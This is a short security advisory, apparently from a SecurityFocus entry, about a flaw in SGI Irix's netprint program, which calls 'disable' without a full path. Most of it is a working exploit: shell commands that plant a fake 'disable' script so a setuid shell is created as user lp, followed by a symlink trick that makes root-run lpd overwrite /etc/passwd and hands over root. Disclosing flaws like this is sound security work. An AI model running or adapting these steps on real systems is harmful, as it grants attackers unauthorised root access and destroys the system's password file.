source: http://www.securityfocus.com/bid/395/info A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp. % cat > /tmp/disable cp /bin/sh /tmp/lpshell chmod 4755 /tmp/lpshell ^D % set path=(. $path) % netprint -n blah -h blah -p blah 1-234 % /tmp/lpshell However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.